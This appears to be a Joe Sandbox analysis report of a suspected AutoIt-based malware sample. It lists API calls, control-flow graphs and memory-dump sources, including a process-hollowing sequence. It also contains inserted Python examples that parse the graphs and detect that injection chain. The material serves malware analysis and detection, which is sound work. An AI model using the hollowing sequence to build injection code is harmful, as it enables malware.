                                                                      • Opcode ID: cb06c2e29ada771c4bbcdde7ac8d9f4eecad8c0eef81a9953946f2564b50e141
                                                                      • Instruction ID: 3937417975c95bbd9ec0434c62c63d44db5579fdc9c47508e4b2e3f4a50d1f27
                                                                      • Opcode Fuzzy Hash: cb06c2e29ada771c4bbcdde7ac8d9f4eecad8c0eef81a9953946f2564b50e141
                                                                      • Instruction Fuzzy Hash: 5E71B271A05304AEC704DF65EC82FABB7E8FF99340F40492EF5458B1A1EB309A49CB52

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 009C2B8E
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 009C2B9D
                                                                      • LoadIconW.USER32(00000063), ref: 009C2BB3
                                                                      • LoadIconW.USER32(000000A4), ref: 009C2BC5
                                                                      • LoadIconW.USER32(000000A2), ref: 009C2BD7
                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 009C2BEF
                                                                      • RegisterClassExW.USER32(?), ref: 009C2C40
                                                                        • Part of subcall function 009C2CD4: GetSysColorBrush.USER32(0000000F), ref: 009C2D07
                                                                        • Part of subcall function 009C2CD4: RegisterClassExW.USER32(00000030), ref: 009C2D31
                                                                        • Part of subcall function 009C2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009C2D42
                                                                        • Part of subcall function 009C2CD4: InitCommonControlsEx.COMCTL32(?), ref: 009C2D5F
                                                                        • Part of subcall function 009C2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009C2D6F
                                                                        • Part of subcall function 009C2CD4: LoadIconW.USER32(000000A9), ref: 009C2D85
                                                                        • Part of subcall function 009C2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009C2D94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: bc4bb7acc0b0f08076a2d8346beff001b3d8028e513ea97d692c51245a9d24f1
                                                                      • Instruction ID: caeeffcd1ddca7914bdec013dd3f19b0c7493b051738430e9f271f9cafab4426
                                                                      • Opcode Fuzzy Hash: bc4bb7acc0b0f08076a2d8346beff001b3d8028e513ea97d692c51245a9d24f1
                                                                      • Instruction Fuzzy Hash: 05211874E00319AFDB50DFE5EC59BAA7FB4FB48B54F04411BE504AA6A0DBB10542CF90

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,009C316A,?,?), ref: 009C31D8
                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,009C316A,?,?), ref: 009C3204
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009C3227
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,009C316A,?,?), ref: 009C3232
                                                                      • CreatePopupMenu.USER32 ref: 009C3246
                                                                      • PostQuitMessage.USER32(00000000), ref: 009C3267
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: ac75e1c7abbd135b4e17df576c3e2be2de91debce48f18f79e7398521289b49a
                                                                      • Instruction ID: fe431e987f915b205d3ae3295ae452bb5b31e242d1e35ab0b1e4e29186f5bdc8
                                                                      • Opcode Fuzzy Hash: ac75e1c7abbd135b4e17df576c3e2be2de91debce48f18f79e7398521289b49a
                                                                      • Instruction Fuzzy Hash: ED415731B44305AFDF159BB89D0DFB93A68E749350F08C12EF5128A5A1DB648E029B63

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 016E2289
                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 016E24AF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_16df000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileFreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 204039940-0
                                                                      • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                      • Instruction ID: 2abcea8afb3cd563065296ac6f8a6606b94bedfe151c48e61130ae4d8f0a4aea
                                                                      • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                      • Instruction Fuzzy Hash: 15A10A70E01209EBDB14CFA4C898BEEBBB6BF48305F20825DE515BB280D7759A45CF95

                                                                      Control-flow Graph

                                                                      control_flow_graph 563 9c2c63-9c2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                      APIs
                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009C2C91
                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 009C2CB2
                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,009C1CAD,?), ref: 009C2CC6
                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,009C1CAD,?), ref: 009C2CCF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: b7ebb9e1295f56ac226fa5d3f28befc96cff2ab1765730697186208e386fe01e
                                                                      • Instruction ID: 4205bcda65233e9c7467a8dc28363b28e06f32d5dd2f9027d6208ab620615b63
                                                                      • Opcode Fuzzy Hash: b7ebb9e1295f56ac226fa5d3f28befc96cff2ab1765730697186208e386fe01e
                                                                      • Instruction Fuzzy Hash: 00F030796403917EE77087636C0CE772E7DE7CAF61B00005AF9049A560DA710842DA70

                                                                      Control-flow Graph

                                                                      control_flow_graph 678 16e1f38-16e20ba call 16dfb88 call 16e1e28 CreateFileW 685 16e20bc 678->685 686 16e20c1-16e20d1 678->686 687 16e2171-16e2176 685->687 689 16e20d8-16e20f2 VirtualAlloc 686->689 690 16e20d3 686->690 691 16e20f6-16e210d ReadFile 689->691 692 16e20f4 689->692 690->687 693 16e210f 691->693 694 16e2111-16e214b call 16e1e68 call 16e0e28 691->694 692->687 693->687 699 16e214d-16e2162 call 16e1eb8 694->699 700 16e2167-16e216f ExitProcess 694->700 699->700 700->687
                                                                      APIs
                                                                        • Part of subcall function 016E1E28: Sleep.KERNELBASE(000001F4), ref: 016E1E39
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016E20AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_16df000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: VJV7XQ9EQRFV353E2OBBFEWJN2OR
                                                                      • API String ID: 2694422964-3421154003
                                                                      • Opcode ID: a9f295cf980038b5d9f069129b512694261fae3db3986f439e7566c0bbe00b01
                                                                      • Instruction ID: b9a77bcef6c3b636887f4104e6da86c61f033c512a1ea7804a61705e004351a3
                                                                      • Opcode Fuzzy Hash: a9f295cf980038b5d9f069129b512694261fae3db3986f439e7566c0bbe00b01
                                                                      • Instruction Fuzzy Hash: 57716330D04289DAEF11DBA4C8587DEBBB9AF15304F044199E6487B2C1D7BA4B45CBA6
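The `control_flow_graph` line above is the report's textual form of the function's graph: each basic block is an integer id, an address or address range, and the calls it makes (`call <addr>` for internal targets, a bare name for an imported API, `* N` for N calls in one block); `a->b` is an edge. The following Python is an added example, not part of the Joe Sandbox report and not code from the sample: it parses that text, walks the graph by breadth-first search and returns the imported APIs met on the shortest path from the entry block to a block that calls a given API. Run on the graph of the function above it recovers the CreateFileW, VirtualAlloc, ReadFile, ExitProcess chain that the API list only hints at. The token shapes and the assumption that the first block listed is the entry are inferred from the report's format.

```python
import re
from collections import deque

# Token shapes of Joe Sandbox's textual control-flow graph (inferred from the report).
HEX_RANGE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")   # block start or start-end
EDGE = re.compile(r"^(\d+)->(\d+)$")                    # src->dst

# Sample input: the control_flow_graph line of the CreateFileW / ExitProcess function above.
CFG_TEXT = (
    "control_flow_graph 678 16e1f38-16e20ba call 16dfb88 call 16e1e28 CreateFileW "
    "685 16e20bc 678->685 686 16e20c1-16e20d1 678->686 687 16e2171-16e2176 685->687 "
    "689 16e20d8-16e20f2 VirtualAlloc 686->689 690 16e20d3 686->690 "
    "691 16e20f6-16e210d ReadFile 689->691 692 16e20f4 689->692 690->687 "
    "693 16e210f 691->693 694 16e2111-16e214b call 16e1e68 call 16e0e28 691->694 "
    "692->687 693->687 699 16e214d-16e2162 call 16e1eb8 694->699 "
    "700 16e2167-16e216f ExitProcess 694->700 699->700 700->687"
)


def parse_cfg(text):
    """Return (nodes, edges, entry). nodes maps id -> {"range": str, "labels": [str]}."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, entry, current = {}, [], None, None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and HEX_RANGE.match(tokens[i + 1]):
            current = int(tok)                          # new basic block: "<id> <addr[-addr]>"
            nodes[current] = {"range": tokens[i + 1], "labels": []}
            if entry is None:
                entry = current                         # assumption: first block listed is the entry
            i += 2
        elif tok == "call" and i + 1 < len(tokens) and current is not None:
            nodes[current]["labels"].append("call " + tokens[i + 1])   # internal call target
            i += 2
        elif tok == "*" and i + 1 < len(tokens) and current is not None and nodes[current]["labels"]:
            nodes[current]["labels"][-1] += " *" + tokens[i + 1]       # "API * N": N calls in the block
            i += 2
        else:
            if current is not None:
                nodes[current]["labels"].append(tok)    # imported API name
            i += 1
    return nodes, edges, entry


def apis_in(node):
    """Imported API names recorded on a block (internal 'call xxxx' targets excluded)."""
    return [lbl.split(" *")[0] for lbl in node["labels"] if not lbl.startswith("call ")]


def shortest_path(edges, src, dst):
    """BFS over the edge list; node ids from src to dst, or [] when dst is unreachable."""
    adj = {}
    for a, b in edges:
        adj.setdefault(a, []).append(b)
    parent, queue = {src: None}, deque([src])
    while queue:
        n = queue.popleft()
        if n == dst:
            path = []
            while n is not None:
                path.append(n)
                n = parent[n]
            return path[::-1]
        for nxt in adj.get(n, []):
            if nxt not in parent:
                parent[nxt] = n
                queue.append(nxt)
    return []


def api_sequence_to(cfg_text, api_name):
    """APIs called along the shortest entry->block path that reaches a block calling api_name."""
    nodes, edges, entry = parse_cfg(cfg_text)
    targets = [nid for nid, n in nodes.items() if api_name in apis_in(n)]
    best = []
    for t in targets:
        path = shortest_path(edges, entry, t)
        if path and (not best or len(path) < len(best)):
            best = path
    return [api for nid in best for api in apis_in(nodes[nid])]


if __name__ == "__main__":
    print(api_sequence_to(CFG_TEXT, "ExitProcess"))
```

Blocks that only branch (no label) drop out of the returned sequence, so the result reads as the API trace the sandbox would see on that path; pointing `api_sequence_to` at an API the graph never reaches returns an empty list.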

                                                                      APIs
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A32C05
                                                                      • DeleteFileW.KERNEL32(?), ref: 00A32C87
                                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A32C9D
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A32CAE
                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A32CC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: File$Delete$Copy
                                                                      • String ID:
                                                                      • API String ID: 3226157194-0
                                                                      • Opcode ID: f7142e1088d880a1140e0dad7cd920fae6abc7f5cdc91c978a94ff8096cf69c6
                                                                      • Instruction ID: 36a4b653dfc39104a37f38f60dc55fd378e32ee4bd3c6d051a80bca6c410f565
                                                                      • Opcode Fuzzy Hash: f7142e1088d880a1140e0dad7cd920fae6abc7f5cdc91c978a94ff8096cf69c6
                                                                      • Instruction Fuzzy Hash: 52B13D72D01219ABDF11EFA5CD85FDEB7BDEF48350F1040A6F609E6151EA30AE448B61

                                                                      Control-flow Graph

                                                                      control_flow_graph 844 9c3b1c-9c3b27 845 9c3b99-9c3b9b 844->845 846 9c3b29-9c3b2e 844->846 847 9c3b8c-9c3b8f 845->847 846->845 848 9c3b30-9c3b48 RegOpenKeyExW 846->848 848->845 849 9c3b4a-9c3b69 RegQueryValueExW 848->849 850 9c3b6b-9c3b76 849->850 851 9c3b80-9c3b8b RegCloseKey 849->851 852 9c3b78-9c3b7a 850->852 853 9c3b90-9c3b97 850->853 851->847 854 9c3b7e 852->854 853->854 854->851
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,009C3B0F,SwapMouseButtons,00000004,?), ref: 009C3B40
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,009C3B0F,SwapMouseButtons,00000004,?), ref: 009C3B61
                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,009C3B0F,SwapMouseButtons,00000004,?), ref: 009C3B83
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 3677997916-824357125
                                                                      • Opcode ID: 8a8bbd11ad7162330bbcfb3443677db4000455e3f46034f9cc8a57e1ec6e6317
                                                                      • Instruction ID: 7f09e8edf4a8ae40774efe0cc17b512861e79363942806c819e001347f767d6d
                                                                      • Opcode Fuzzy Hash: 8a8bbd11ad7162330bbcfb3443677db4000455e3f46034f9cc8a57e1ec6e6317
                                                                      • Instruction Fuzzy Hash: D51118B5910208FFDB20CFA5DC44EBEB7BCEF04755B10C959B805D7110E2319E419B61

                                                                      Control-flow Graph

                                                                      control_flow_graph 855 16e0e28-16e0ec8 call 16e32f8 * 3 862 16e0edf 855->862 863 16e0eca-16e0ed4 855->863 865 16e0ee6-16e0eef 862->865 863->862 864 16e0ed6-16e0edd 863->864 864->865 866 16e0ef6-16e15a8 865->866 867 16e15aa-16e15ae 866->867 868 16e15bb-16e15e8 CreateProcessW 866->868 869 16e15f4-16e1621 867->869 870 16e15b0-16e15b4 867->870 875 16e15ea-16e15ed 868->875 876 16e15f2 868->876 886 16e162b 869->886 887 16e1623-16e1626 869->887 871 16e162d-16e165a 870->871 872 16e15b6 870->872 874 16e1664-16e167e Wow64GetThreadContext 871->874 896 16e165c-16e165f 871->896 872->874 879 16e1685-16e16a0 ReadProcessMemory 874->879 880 16e1680 874->880 881 16e19e9-16e19eb 875->881 876->874 884 16e16a7-16e16b0 879->884 885 16e16a2 879->885 883 16e1992-16e1996 880->883 888 16e1998-16e199c 883->888 889 16e19e7 883->889 891 16e16d9-16e16f8 call 16e2978 884->891 892 16e16b2-16e16c1 884->892 885->883 886->874 887->881 893 16e199e-16e19aa 888->893 894 16e19b1-16e19b5 888->894 889->881 904 16e16ff-16e1722 call 16e2ab8 891->904 905 16e16fa 891->905 892->891 897 16e16c3-16e16d2 call 16e28c8 892->897 893->894 900 16e19b7-16e19ba 894->900 901 16e19c1-16e19c5 894->901 896->881 897->891 908 16e16d4 897->908 900->901 906 16e19c7-16e19ca 901->906 907 16e19d1-16e19d5 901->907 914 16e176c-16e178d call 16e2ab8 904->914 915 16e1724-16e172b 904->915 905->883 906->907 910 16e19d7-16e19dd call 16e28c8 907->910 911 16e19e2-16e19e5 907->911 908->883 910->911 911->881 921 16e178f 914->921 922 16e1794-16e17b2 call 16e3318 914->922 917 16e172d-16e175e call 16e2ab8 915->917 918 16e1767 915->918 925 16e1765 917->925 926 16e1760 917->926 918->883 921->883 928 16e17bd-16e17c7 922->928 925->914 926->883 929 16e17fd-16e1801 928->929 930 16e17c9-16e17fb call 16e3318 928->930 932 16e18ec-16e1909 call 16e24c8 929->932 933 16e1807-16e1817 929->933 930->928 941 16e190b 932->941 942 16e1910-16e192f Wow64SetThreadContext 932->942 933->932 936 16e181d-16e182d 933->936 936->932 937 16e1833-16e1857 936->937 940 16e185a-16e185e 937->940 940->932 943 16e1864-16e1879 940->943 941->883 944 16e1933-16e193e call 16e27f8 942->944 945 16e1931 942->945 947 16e188d-16e1891 943->947 951 16e1942-16e1946 944->951 952 16e1940 944->952 945->883 949 16e18cf-16e18e7 947->949 950 16e1893-16e189f 947->950 949->940 953 16e18cd 950->953 954 16e18a1-16e18cb 950->954 955 16e1948-16e194b 951->955 956 16e1952-16e1956 951->956 952->883 953->947 954->953 955->956 958 16e1958-16e195b 956->958 959 16e1962-16e1966 956->959 958->959 960 16e1968-16e196b 959->960 961 16e1972-16e1976 959->961 960->961 962 16e1978-16e197e call 16e28c8 961->962 963 16e1983-16e198c 961->963 962->963 963->866 963->883
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 016E15E3
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016E1679
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016E169B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_16df000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                                                                      • Instruction ID: da0accb374c268dd6355fa530f3f9c613ba63b4d9927d14e9eb6e14467a20c37
                                                                      • Opcode Fuzzy Hash: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                                                                      • Instruction Fuzzy Hash: D762FA30A152189BEB24DBA4CC54BEEB776FF58300F1091A9D10DEB390E7759E81CB59
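The API list above records CreateProcessW, Wow64GetThreadContext and ReadProcessMemory, and the graph also shows a Wow64SetThreadContext call in block 16e1910-16e192f. In that order these are the backbone of process hollowing: a child is created, its primary thread's (32-bit) context is read, its memory is read and rewritten, and the context is set so the thread starts in the replacement image; this is what the report's "Modifies the context of a thread in another process" and "Writes to foreign memory regions" signatures key on. The Python below is an added example, not the report's own logic and not code from the sample. It parses API lines in the report's `Name.Module(args), ref: ADDR` shape, orders them by call-site address as a stand-in for execution order, and reports whether the ordered chain is present, with the other injection APIs as corroboration. The input traces are constructed here: the first reproduces the three lines above plus a Wow64SetThreadContext line whose ref address is made up to fall inside block 16e1910-16e192f (the report gives none); the second is a benign CreateProcessW use for contrast.

```python
import re

# One API line in the report's "APIs" lists: Name.Module(args), ref: ADDR
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Ordered, mandatory steps of a hollowing chain; each step accepts any of the listed names.
REQUIRED = [
    ("create_process", {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"}),
    ("get_context", {"GetThreadContext", "Wow64GetThreadContext"}),
    ("set_context", {"SetThreadContext", "Wow64SetThreadContext"}),
]
# Calls that strengthen the verdict but are not required for a hit (a loader may use ReadProcessMemory
# to locate the image base, unmap and rewrite it, then resume the thread).
CORROBORATING = {
    "ReadProcessMemory", "WriteProcessMemory", "NtWriteVirtualMemory", "VirtualAllocEx",
    "NtUnmapViewOfSection", "ZwUnmapViewOfSection", "ResumeThread", "NtResumeThread",
}

# Constructed sample trace: the report's three lines plus a SetThreadContext line with a made-up ref.
SAMPLE_TRACE = """\
• CreateProcessW.KERNELBASE(?,00000000), ref: 016E15E3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016E1679
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016E169B
• Wow64SetThreadContext.KERNEL32(?,?), ref: 016E192A
"""

# Constructed benign trace: spawn a child and wait for it, no context manipulation.
BENIGN_TRACE = """\
• CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00A01000
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A01020
• CloseHandle.KERNEL32(?), ref: 00A01030
"""


def parse_api_lines(text):
    """Return [(ref_address, api, module)] sorted by call-site address; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            calls.append((int(m.group("ref"), 16), m.group("api"), m.group("module")))
    return sorted(calls)


def match_hollowing(calls):
    """Walk the calls in address order and consume REQUIRED steps as they appear, in order only."""
    matched, corroborating, step = [], [], 0
    for ref, api, _module in calls:
        if step < len(REQUIRED) and api in REQUIRED[step][1]:
            matched.append((REQUIRED[step][0], api, ref))
            step += 1
        elif api in CORROBORATING:
            corroborating.append((api, ref))
    return {"hit": step == len(REQUIRED), "matched": matched, "corroborating": corroborating}


def describe(text):
    """Human-readable verdict for one APIs list; the dict from match_hollowing is the machine result."""
    r = match_hollowing(parse_api_lines(text))
    chain = " -> ".join(f"{api}@{ref:08X}" for _step, api, ref in r["matched"])
    return ("HOLLOWING " if r["hit"] else "no chain ") + chain


if __name__ == "__main__":
    print(describe(SAMPLE_TRACE))
    print(describe(BENIGN_TRACE))
```

The order check is deliberate: a SetThreadContext that precedes CreateProcessW in the sorted list does not count, so the same three names scattered across unrelated code do not fire. Address order is only a proxy for the executed order; for a stronger statement, take the call order from a path through the control-flow graph rather than from the sorted address list.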
                                                                      Strings
                                                                      • Variable must be of type 'Object'., xrefs: 00A132B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable must be of type 'Object'.
                                                                      • API String ID: 0-109567571
                                                                      • Opcode ID: ad09644f85639b30377ca9d0439996a66a52e9a181458e133670b446150b8c75
                                                                      • Instruction ID: 7d3e22112da04de7bfd9211ec53615c2d92cd360715034017d2caf42183119c0
                                                                      • Opcode Fuzzy Hash: ad09644f85639b30377ca9d0439996a66a52e9a181458e133670b446150b8c75
                                                                      • Instruction Fuzzy Hash: 12C27771E00205DFCB24CF98C881FADB7B5BF48310F24856AE916AB391D775AD81CB92
                                                                      APIs
                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A033A2
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 009C3A04
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                      • String ID: Line:
                                                                      • API String ID: 2289894680-1585850449
                                                                      • Opcode ID: 3d2531fea46dce65e3649fb10da88832823f3aef364fd4aada2771bdaa663940
                                                                      • Instruction ID: 27333771386d2bc410d8f6d40a991f6bef282e351eac3c12073b3dff2627b4f2
                                                                      • Opcode Fuzzy Hash: 3d2531fea46dce65e3649fb10da88832823f3aef364fd4aada2771bdaa663940
